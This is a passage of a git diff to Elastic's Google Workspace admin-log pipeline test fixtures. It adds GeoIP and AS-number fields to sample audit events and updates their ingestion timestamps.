"REMOVE_APPLICATION_FROM_WHITELIST", @@ -4388,6 +5204,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4397,7 +5225,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916110700Z", + "ingested": "2021-12-14T14:44:24.297943869Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RENEW_DOMAIN_REGISTRATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_RENEW_DOMAIN_REGISTRATION", @@ -4450,6 +5278,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4459,7 +5299,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916116600Z", + "ingested": "2021-12-14T14:44:24.297944227Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RESELLER_ACCESS\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_RESELLER_ACCESS", @@ -4514,6 +5354,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4523,7 +5375,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916121900Z", + "ingested": "2021-12-14T14:44:24.297944555Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_ACTIONS_CHANGED\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "RULE_ACTIONS_CHANGED", @@ -4578,6 +5430,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4587,7 +5451,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916125600Z", + "ingested": "2021-12-14T14:44:24.297944889Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "CREATE_RULE", @@ -4642,6 +5506,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4651,7 +5527,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916130200Z", + "ingested": "2021-12-14T14:44:24.297945225Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_RULE_CRITERIA\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "CHANGE_RULE_CRITERIA", @@ -4706,6 +5582,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4715,7 +5603,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916136100Z", + "ingested": "2021-12-14T14:44:24.297945621Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"DELETE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "DELETE_RULE", @@ -4768,6 +5656,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4777,7 +5677,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916142300Z", + "ingested": "2021-12-14T14:44:24.297946067Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RENAME_RULE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "RENAME_RULE", @@ -4830,6 +5730,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4839,7 +5751,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916146500Z", + "ingested": "2021-12-14T14:44:24.297946406Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"RULE_STATUS_CHANGED\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "RULE_STATUS_CHANGED", @@ -4894,6 +5806,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4903,7 +5827,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916151300Z", + "ingested": "2021-12-14T14:44:24.297946736Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "ADD_SECONDARY_DOMAIN", @@ -4958,6 +5882,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -4967,7 +5903,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916156900Z", + "ingested": "2021-12-14T14:44:24.297947066Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "REMOVE_SECONDARY_DOMAIN", @@ -5022,6 +5958,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -5031,7 +5979,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916161200Z", + "ingested": "2021-12-14T14:44:24.297947576Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "SKIP_SECONDARY_DOMAIN_MX", @@ -5086,6 +6034,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -5095,7 +6055,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916165800Z", + "ingested": "2021-12-14T14:44:24.297947908Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN_MX\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "VERIFY_SECONDARY_DOMAIN_MX", @@ -5150,6 +6110,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -5159,7 +6131,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916171700Z", + "ingested": "2021-12-14T14:44:24.297948259Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_SECONDARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SECONDARY_DOMAIN_NAME\",\"value\":\"example2.com\"}]}}", "provider": "admin", "action": "VERIFY_SECONDARY_DOMAIN", @@ -5214,6 +6186,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -5223,7 +6207,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916176300Z", + "ingested": "2021-12-14T14:44:24.297948596Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_DOMAIN_SECONDARY_EMAIL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "UPDATE_DOMAIN_SECONDARY_EMAIL", @@ -5278,6 +6262,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -5287,7 +6283,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916180500Z", + "ingested": "2021-12-14T14:44:24.297949002Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_SSO_SETTINGS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "CHANGE_SSO_SETTINGS", @@ -5338,6 +6334,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -5347,7 +6355,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916184800Z", + "ingested": "2021-12-14T14:44:24.297949343Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_PIN\"}}", "provider": "admin", "action": "GENERATE_PIN", @@ -5402,6 +6410,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -5411,7 +6431,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:31.916189400Z", + "ingested": "2021-12-14T14:44:24.297949674Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPDATE_RULE\",\"parameters\":[{\"name\":\"RULE_NAME\",\"value\":\"rule\"}]}}", "provider": "admin", "action": "UPDATE_RULE", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log-expected.json index 338470c38ea..38d28b73348 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-gmail.log-expected.json @@ -36,6 +36,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -45,7 +57,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:42.563962500Z", + "ingested": "2021-12-14T14:44:37.267056140Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DROP_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}", "provider": "admin", "action": "DROP_FROM_QUARANTINE", @@ -102,6 +114,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -111,7 +135,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:42.563970900Z", + "ingested": "2021-12-14T14:44:37.267058511Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_LOG_SEARCH\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_END_DATE\",\"value\":\"2020/07/28 04:59:59 UTC\"},{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"EMAIL_LOG_SEARCH_RECIPIENT\",\"value\":\"recipient\"},{\"name\":\"EMAIL_LOG_SEARCH_SENDER\",\"value\":\"sender\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_RECIPIENT_IP\",\"value\":\"1.1.1.1\"},{\"name\":\"EMAIL_LOG_SEARCH_SMTP_SENDER_IP\",\"value\":\"1.1.1.1\"},{\"name\":\"EMAIL_LOG_SEARCH_START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}", "provider": "admin", "action": "EMAIL_LOG_SEARCH", @@ -162,6 +186,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -171,7 +207,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:42.563976300Z", + "ingested": "2021-12-14T14:44:37.267058862Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"EMAIL_UNDELETE\",\"parameters\":[{\"name\":\"END_DATE\",\"value\":\"2002-10-02T12:00:00Z\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"START_DATE\",\"value\":\"2002-10-02T10:00:00Z\"}]}}", "provider": "admin", "action": "EMAIL_UNDELETE", @@ -227,6 +263,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -236,7 +284,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:42.563981600Z", + "ingested": "2021-12-14T14:44:37.267059212Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_EMAIL_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_EMAIL_SETTING", @@ -292,6 +340,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -301,7 +361,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:42.563987Z", + "ingested": "2021-12-14T14:44:37.267059535Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CHANGE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}", "provider": "admin", "action": "CHANGE_GMAIL_SETTING", @@ -357,6 +417,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -366,7 +438,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:42.563991Z", + "ingested": "2021-12-14T14:44:37.267064355Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"CREATE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}", "provider": "admin", "action": "CREATE_GMAIL_SETTING", @@ -422,6 +494,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -431,7 +515,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:42.563995300Z", + "ingested": "2021-12-14T14:44:37.267064788Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"DELETE_GMAIL_SETTING\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_DESCRIPTION\",\"value\":\"setting description\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"USER_DEFINED_SETTING_NAME\",\"value\":\"setting name\"}]}}", "provider": "admin", "action": "DELETE_GMAIL_SETTING", @@ -489,6 +573,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -498,7 +594,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:42.564000600Z", + "ingested": "2021-12-14T14:44:37.267065152Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"EMAIL_SETTINGS\",\"name\":\"REJECT_FROM_QUARANTINE\",\"parameters\":[{\"name\":\"EMAIL_LOG_SEARCH_MSG_ID\",\"value\":\"id\"},{\"name\":\"QUARANTINE_NAME\",\"value\":\"quarantine\"}]}}", "provider": "admin", "action": "REJECT_FROM_QUARANTINE", @@ -555,6 +651,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -564,7 +672,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:42.564005200Z", + "ingested": "2021-12-14T14:44:37.267065510Z", "original": 